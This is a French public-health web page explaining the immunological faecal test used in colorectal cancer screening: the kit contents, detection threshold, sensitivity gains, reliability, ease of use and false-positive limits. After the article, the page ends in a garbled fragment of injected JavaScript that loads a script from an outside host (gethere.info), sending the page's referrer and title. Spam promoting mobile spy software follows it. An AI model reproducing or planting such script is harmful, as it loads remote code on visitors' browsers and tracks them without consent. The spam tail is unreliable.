Dépistage Colon

Dépistage du cancer colorectal

cancer_colorectal_kit-pret-envoi-

Le dépistage du cancer colorectal est facilité par le nouveau test immunologique de détection de sang occulte dans les selles. Ce test sera progressivement diffusé, par l’intermédiaire du médecin traitant, auprès des 18 millions de personnes de 50 à 74 ans concernées par le programme de dépistage organisé. Il possède une sensibilité accrue, permettant une meilleure détection des cancers et des adénomes. Le rôle des médecins traitants est déterminant pour informer et sensibiliser la population-cible sur l’intérêt majeur de ce dépistage.

Un test en trois volets

Ce test se compose de trois volets :

  • un mode d’emploi ;
  • le support de recueil des selles et une fiche d’identification pour la restitution du résultat ;
  • un tube de prélèvement et un sachet de protection, ainsi que l’enveloppe T de retour du test.
test immunologique mode d'emploi



Performance, fiabilité, simplicité

les plus du test immunologique

Performance : au seuil de 150 ng HB/ml, retenu en France, le test immunologique permet de détecter environ 2 fois plus de cancers et 2,5 fois plus d’adénomes à haut risque de transformation maligne, dits « adénomes avancés » (de taille ≥ 1cm ou à contingent villeux supérieur à 25 % ou en dysplasie de haut grade). Les gains en sensibilité associés à ce test présentent un intérêt supplémentaire dans le cadre d’une démarche préventive, en permettant la détection de cancers débutants et de lésions avant leur transformation en cancer.

Fiabilité : ce test repose sur la détection d’hémoglobine humaine dans les selles grâce à l’utilisation d’anticorps monoclonaux ou polyclonaux, spécifiques de la partie globine de l’hémoglobine humaine. Il ne sera donc pas rendu positif en présence d’hémoglobine animale issue de l’alimentation. Par ailleurs, le seuil de positivité, actuellement fixé à 150 ng HB/ml, peut être ajusté. L’automatisation de la lecture garantit à la fois la fiabilité et la reproductibilité des procédures de recherche de sang occulte dans les selles, ce qui permet d’en renforcer l’assurance qualité.

Simplicité : le test immunologique est facile et rapide à utiliser :

  • un seul prélèvement de selles ;
  • une méthode ergonomique ;
  • une manipulation hygiénique.

Cette simplicité d’utilisation devrait permettre d’augmenter la participation de la population-cible au dépistage organisé du cancer colorectal en France de 10 à 15 points. Elle se situait autour de 30 % en 2013-2014, alors que le seuil de participation recommandé en Europe est de 45 %.

Limites : comme tout test de dépistage, celui consistant à rechercher du sang occulte dans les selles peut générer de « faux positifs ». Ainsi, dans plus de 90 % des cas, une coloscopie réalisée après un test positif ne révèlera pas de lésion cancéreuse. A cet égard, on estime que le test immunologique génèrera un nombre de coloscopies environ deux fois plus important que l’ancien test. Toutefois, elles seront réalisées à meilleur escient, par ciblage des personnes ayant un test immunologique positif et donc considérées comme plus susceptibles d’avoir une lésion.

Risques : le test immunologique ne présente aucun risque.

Test immunologique

 


 

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +  »; } else {https://topspyapps.net - The most popular 2017 spy software applications for the mobile phones.topspyapps.net